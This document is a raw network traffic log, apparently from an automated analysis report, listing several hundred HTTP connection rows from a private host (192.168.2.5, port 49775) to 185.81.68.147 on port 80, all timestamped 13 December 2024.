Dec 13, 2024 01:37:35.822782993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822805882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822824955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822860956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822875977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822885990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822911978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822935104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.822951078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823079109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823101997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823133945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823170900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823193073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823219061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823249102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823263884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823292017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823367119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823380947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823404074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823427916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823442936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823470116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823542118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823571920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823595047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823638916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823638916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823654890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823677063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823690891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.823721886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.830838919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.830916882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.830934048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.830966949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.830986023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831047058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831083059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831083059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831083059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831101894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831109047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831154108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831172943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831188917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831216097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831232071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831258059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831271887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831291914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831329107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831346035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831346035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831372976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831387043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831408024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831424952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831444025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831485033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831506968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831521034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831573009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831573009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831590891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831610918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831624031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831646919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831662893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831684113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831697941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831717968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831738949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831764936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831779003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831813097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831830025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831851959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831871986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831890106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831928015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831928015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831948042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831965923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.831979990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.832000971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.832015038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862396002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862452984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862476110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862502098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862524986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862763882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862972021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.862988949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863009930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863048077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863071918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863082886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863112926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863131046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863153934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863243103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863266945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863295078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863311052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863339901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863357067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863373995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863396883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863411903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863434076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863447905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863482952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863501072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863527060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863543987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863569975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863588095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863609076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863636017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863656044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863676071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863698959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.863713026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.864051104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.864967108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.865000963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.865020990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.865062952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.865077019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.865101099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.865133047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.865156889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867223024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867237091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867259026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867285013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867300034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867328882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867343903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867362022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867388010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867396116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867415905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867465019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867655039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867682934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867712021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867727041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867748022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867762089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867783070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867808104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.867865086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868005037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868019104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868038893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868062019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868077040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868099928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868136883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868163109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868176937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868206024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868221998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868387938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868412018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868427038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868457079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868470907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868493080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868505955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868535042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868561029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868582010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868603945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868750095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868772984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868787050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868813038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868827105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868850946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868865013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868884087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868897915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868916988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868932009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868952036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868967056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.868995905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869009972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869028091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869059086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869072914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869309902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869334936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869349957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869370937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869386911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869404078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869431019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869455099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869468927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869491100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869508028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869535923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869559050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869575024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869601965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869616985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869637012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869651079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869671106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869684935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869704008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869718075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869740963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869754076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869776011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869791031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869812965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869837046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869851112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869870901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869889021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869911909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869925976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869949102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869962931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.869988918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870013952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870027065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870054960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870085955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870102882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870117903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870132923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870161057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870174885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870194912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870225906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870244980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870259047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870284081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870300055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870322943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870336056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870353937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870379925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870492935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870523930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870537996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870562077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870585918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870600939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870620966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870657921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870672941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870696068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870714903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870737076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870871067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870884895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870908976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870934963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870958090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870979071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.870992899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871012926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871036053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871051073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871074915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871154070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871184111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871196985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871227980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871242046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871258020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871273994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871299028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871332884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871386051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871414900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871428967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871455908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871481895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871498108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871515989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871596098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871609926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871629953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871654034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871668100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871691942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871705055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871731997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871751070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871768951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871789932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871803999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871825933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871844053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871867895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871881008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871915102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871931076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871952057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.871980906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872004032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872023106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872049093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872062922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872091055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872106075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872128010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872142076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872163057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872186899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872205019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872502089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872535944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872559071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872574091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872607946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872622013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872642994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872656107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872678995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872694969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872716904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872730970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872750044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872764111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872792959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872917891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872934103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872970104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:35.872996092 CET	49775	80	192.168.2.5	185.81.68.147
